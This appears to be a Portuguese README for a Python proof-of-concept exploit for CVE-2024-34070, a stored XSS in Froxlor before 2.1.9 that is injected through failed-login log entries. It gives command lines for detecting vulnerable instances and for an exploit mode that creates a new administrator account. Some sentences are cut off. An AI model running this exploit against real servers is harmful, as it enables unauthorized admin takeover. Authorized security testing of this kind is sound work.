
Exploit de prova de conceito para CVE-2024-34070, um XSS armazenado no Froxlor. Detecta instâncias vulneráveis, extrai a versão e injeta payload para criar uma conta de administrador.
Prova de conceito em Python para CVE-2024-34070, um problema de XSS armazenado no Froxlor anterior à versão 2.1.9 através de tentativas de login falhadas escritas no log do sistema.
Este projeto destina-se exclusivamente a testes de segurança autorizados, laboratórios CTF e uso educacional. Não execute isto contra sistemas que não possui ou para os quais não tenha permissão explícita para testar. O modo de exploração pode criar uma conta de administrador na instância alvo do Froxlor.
< 2.1.9).Detecção não autenticada:
python3 main.py --url http://240.0.0.1:8080 --check
Detecção autenticada, usada para obter a versão exata do Froxlor:
python3 main.py --url http://240.0.0.1:8080 --check --login admin --password 'password'
Modo de exploração, criando um novo administrador:
python3 main.py --url http://240.0.0.1:8080 --exploit \
--new-admin abcd \
--new-password 'Abcd@@1234' \
--new-email [email protected]
Se um administrador ou bot de automação ler os logs do sistema Froxlor, a etapa de verificação deve eventualmente redirecionar para admin_index.php.
--check pode confirmar o Froxlor, mas não pode determinar estritamente a vulnerabilidade./admin_admins.php) para funcionar contra a instância alvo em vez de um domínio fixo.